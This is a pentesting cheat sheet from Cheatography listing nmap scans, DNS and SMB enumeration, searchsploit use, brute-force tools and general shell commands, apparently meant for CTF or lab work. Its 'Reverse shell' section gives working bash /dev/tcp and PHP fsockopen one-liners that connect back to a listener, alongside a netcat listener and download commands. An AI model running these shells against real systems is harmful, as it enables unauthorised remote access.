Cheatography
https://cheatography.com
Basic networkingShow IP configuration ip a s | DNS lookup dig host-name.com | DNS Reverse lookup dig -x 10.10.10.12 | Lookup DNS entries for a host or ip nslookup google.com | IP for hostname host google.com |
Http DownloadUsing curl curl http://host:8080/file.sh - o output.sh | Using wget wget http://host:8080/file.sh |
EnumerationPortscan (first 10000 ports) nmap -sC -sV 10.10.10.12 | Portscan (all ports) nmap -p- -sV 10.10.10.12 | Portscan (UDP) nmap -sU 10.10.10.12 | Gobuster | Dirb | Wordpress enumeration | Website technology enumeration | DNS Enumeration dnsrecon -d google.com -n 10.10.10.12 | DNS Zonetransfer dnsrecon -t axfr -d zonetransfer.me | List subdomains sublist3r -d target-host.com |
Wordlists can be found at
/usr/share/wordlists/dirbuster/
| | Find target in networkReadout ARP cache ip neigh | Nmap Host Discovery nmap -sn 10.10.10.0/24 | TCP scan nmap -Pn 10.10.10.0/24 |
Serving own dataPython2 Webserver (current folder) python -m SimpleHTTPServer 8080 | Python3 Webserver (current folder) python3 -m http.server 8080 | Listen on port nc -lvnp 8080 |
Exploit DBSearch for exploit searchsploit apache | View exploit searchsploit -x path/to/exploit | Copy exploit to current directory searchsploit -m path/to/exploit |
Brute forcingBruteforce websites (e.g. login) hydra | Bruteforce website paths wfuzz | Crack files john |
Check each man-page to find the detailed command parameters
Server Message Block (SMB)SMB enumeration tool smbmap -H 10.10.10.12 | SMB network browser smbtree | SMB Client smbclient //10.10.10.12/ |
| | Useful commandsChange directory cd folder | Create directory mkdir foldername | Delete file rm file.jpg | Delete folder rm -r folder | Search string in file grep pattern file.txt | Find file in a folder find /path -name "*.xml" | Edit file (vi) vi file.txt |
Reverse shellBash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | PHP $sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3"); |
Other webshells can be found at
/usr/share/webshells/
File analysisWhat is this file? file unknown.x | Is there something hidden? binwalk file.png | Extract hidden content binwalk -e file.png |
Encoding/DecodingText to base64 echo -n "text" | base64 | base64 to text echo -n "dGV4dA==" | base64 -d | hexeditor xxd |
|
Created By
Metadata
Favourited By
Comments
No comments yet. Add yours below!
Add a Comment
Related Cheat Sheets